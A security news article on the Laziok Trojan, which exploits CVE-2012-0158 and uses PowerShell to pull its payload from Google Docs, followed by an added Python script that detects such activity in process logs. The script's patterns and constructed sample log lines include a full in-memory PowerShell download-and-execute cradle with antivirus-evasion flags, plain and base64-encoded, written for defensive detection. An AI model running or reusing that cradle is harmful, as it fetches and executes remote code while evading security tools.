Cybercriminals have found a way to abuse PowerShell and Google Docs in order to distribute a Trojan known as Laziok.
This was reported by FireEye recently. Laziok is a Trojan horse: malware that arrives disguised as something harmless and is used to steal information and compromise the security of the victim's system. Laziok was first detected last year during a sophisticated malware campaign targeting energy companies in the Middle East. The attackers take advantage of an old vulnerability, CVE-2012-0158, a flaw in an ActiveX control shipped with Microsoft Office that is triggered by opening a specially crafted Office document. It lets them run code on the victim's machine and install the Laziok Trojan.
According to the FireEye researchers, the attackers got their malicious file past Google's security checks and hosted it on Google Docs. The file was uploaded a month ago and was removed as soon as Google was notified about it.
Normally, users are protected from malicious content on Google Docs because the service actively scans uploads and blocks suspicious or malicious files. The Laziok case shows that this particular file got through those checks and sat on the service unnoticed until it was reported.
The Laziok dropper then abuses PowerShell, which cybercriminals have increasingly turned to, to download the malicious file from Google Docs and launch it.
FireEye researchers explain that PowerShell is attractive to attackers as a way to bypass antivirus software because it can fetch a payload and load it directly in memory, so no file is written to disk for a scanner to inspect. This technique has become common in malware campaigns aimed at stealing information. Once Laziok infects a device, it collects information about the victim's system and sends it back to the attackers, exposing private data and banking information.
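The in-memory download-and-execute pattern described above leaves a recognisable trace in process-creation or PowerShell command-line logs. The following detection script is an added example written for this page; it is not FireEye's code or the Laziok sample, and the log lines it scans are constructed for illustration. It flags the combination of a download cradle, in-memory execution (IEX), AV-evasion flags, a cloud document host, and a suspicious parent such as an Office application, and it decodes -EncodedCommand arguments so that a base64-wrapped cradle is scanned as well.

```python
"""Flag PowerShell command lines that fetch a payload from a cloud document
host and run it in memory. Added example for this article, not code from
the original page or from FireEye; the sample log lines are constructed."""
import base64
import re

# Generic indicators of PowerShell download-and-execute cradles. These are
# patterns common to many droppers, not signatures for Laziok specifically.
RULES = {
    "download_cradle": r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    "in_memory_exec": r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load",
    "evasion_flags": r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|-noni",
    "cloud_doc_host": r"docs\.google\.com|drive\.google\.com",
}

# Parents that should rarely spawn PowerShell in a normal environment
# (assumption: Office applications and the Windows script hosts).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "wscript.exe", "cscript.exe"}

# -EncodedCommand and its short forms; the argument is base64 of UTF-16LE text.
ENC_RE = re.compile(r"(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def build_encoded(script):
    """Encode a script the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline, parent=None):
    """Return the names of the indicators that fire on one command line.
    An encoded command is decoded and scanned together with the raw line."""
    hits = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
        text = cmdline + " " + decoded
    for name, pattern in RULES.items():
        if re.search(pattern, text, re.I):
            hits.append(name)
    if parent and parent.lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    return hits


def is_suspicious(hits):
    """A download combined with in-memory execution is suspicious on its own;
    under an Office or script-host parent, any second indicator is enough.
    A plain download (e.g. an admin fetching a zip) is deliberately not flagged."""
    return ("download_cradle" in hits and "in_memory_exec" in hits) or (
        "office_parent" in hits and len(hits) >= 2
    )


# Constructed cradle for the sample log; the document id is a placeholder.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://docs.google.com/uc?export=download&id=EXAMPLE')"

# Constructed log lines in the form "<parent process>\t<command line>".
SAMPLE_LOG = [
    "explorer.exe\tpowershell.exe Get-Service | Where-Object {$_.Status -eq 'Running'}",
    "WINWORD.EXE\tpowershell.exe -nop -w hidden -ep bypass -c \"" + CRADLE + "\"",
    "wscript.exe\tpowershell.exe -noni -w hidden -enc " + build_encoded(CRADLE),
    "explorer.exe\tpowershell.exe Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip",
]


def analyze_log(lines):
    """Return (parent, hits) for every log line judged suspicious."""
    findings = []
    for line in lines:
        parent, cmdline = line.split("\t", 1)
        hits = score_command(cmdline, parent)
        if is_suspicious(hits):
            findings.append((parent, hits))
    return findings


if __name__ == "__main__":
    for parent, hits in analyze_log(SAMPLE_LOG):
        print(f"{parent}: {', '.join(hits)}")
```

Run against the constructed log, the script flags the Word-spawned cradle and the base64-encoded one launched from wscript.exe, while the benign service query and the plain Invoke-WebRequest download pass. In production the same rules would be applied to Security event 4688 command lines or PowerShell script block logs (event 4104), which is where the decoded content of an -EncodedCommand invocation is otherwise lost.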
Luckily, thanks to prompt detection and reporting, Google Docs users were spared from this particular Laziok campaign. But this will not be the last attempt. Note also that the vulnerability used to get a foothold, CVE-2012-0158, was patched by Microsoft in April 2012 (bulletin MS12-027), so a Windows and Office installation that is kept up to date is not exposed to this exploit. As users, our main protection against such attempts is to be wary of unexpected documents and links, install software updates promptly, and stay informed about the newest threats. Our "How to remove" team is dedicated to keeping users informed about threats in the digital world, along with tips and tricks for a safer online experience. Follow us on our social channels and never miss the news!